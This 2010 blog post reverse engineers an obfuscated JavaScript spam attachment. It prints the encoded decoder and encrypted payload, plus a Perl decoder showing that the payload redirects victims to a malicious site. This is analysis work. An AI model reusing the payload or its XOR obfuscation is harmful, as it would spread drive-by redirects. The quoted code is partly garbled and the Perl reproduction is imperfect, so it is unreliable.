Friday, September 24, 2010

More weaponized javascript email attachments reverse engineered...

My reverse engineering of the latest rash of spam attachment scripts:

 

 

 

use strict; 
use warnings;                                                                                                                                                                         

use URI::Escape;


my $js =  '%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%54%4F%45%4D%50%4A%5A%4D%4C%4B%50%51%42%4E%42%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D';


print uri_unescape( $js );
print "\n";

# the $js string is a function named e_e: 
#    function e_e(e){e=unescape(e);p="TOEMPJZMLKPQBNB";
#    s="";sl=new Array(),k=0,j=0;for(i=0;i80){sl[k++]=s;s=""}}s=sl.join("")+s;document.write(s)}

# My bad perl reproduction...
#
sub e_e {

    my $string = shift;
    my $e = uri_unescape($string);

    my $p = "TOEMPJZMLKPQBNB";

    my $s = "";

    my @sl;
    my $k = 0;
    my $j = 0;

    my @split = split( //, $e );
    my @psplit = split( //, $p );

    for( my $i = 0; $i < length( $e ); $i++ ){

        my $c = ord($split[$i]);

        if ( $c < 128 ) {
            my $result = $psplit[$j % length($p)];
            $c = $c ^ ord( $result );
            $j++;
        }

        $s .= chr($c);

        if( length($s) > 80 ) {
            $sl[$k++] = $s;
            $s = "";
        }
    }

    #s = sl.join("")+s;
    $s .= join( '', @sl );

    print $s;
    print "\n";

}

#This string is passed to the e_e:
e_e('ts%28%28%24%2Bz%258? |%27?7%3D9xo%22%2F%3C?%2988sb%2D%2D%3A%3B #%24wx%7Dw%3E%22%3D%7F&6 ?%7Fb%7F%3E2%28*9?%3C#%27%2C1%3Dk%2E?%27u|b#%24%3C%2Elb%7Bqem%5D@WGp?13%2E%2Bb#&!98wx||%7Busb%2C%2D&%2B ?mhjorw%24#b%2C%257 %29%22%22wxny~fgzv%60t%2E%29%247%24go%2F%2E%3E%25%27%3C%60js1%29nv%3Bm%24957%7Fl* %3B5w%7Fe%2D%3A%3Be %24%2E%221%3B%291c3%257b%24?%3D%3D2!51%3Dk%25%24%27xsp%2D??6n%245%2C pr^K%28%24%2D%27|q%0A%2B%2E%22*1%243%2Bvm?*%3E%22o%3D%27&&#op%295!#9msa^H^D^R                                                        ^C^Krj%29%246%2Emso%7F%60j^[%2D%24#j%0D%28%2Ek0%25%2Bb#%2E6m 859%29%28%244&n %2Do%0D^Y^]^F%0A%22%3B%2E%22%7Dbn^A8&&&p%22??%29k%24%3Eb^\%273&6958fb*                        %24%3E%25|rm5qyb%24%2Edqc?%22o~a65%2D%29%28nGP');

# produces a metarefresh to http://XXXXthefromainerXXXX.com

No comments:

Post a Comment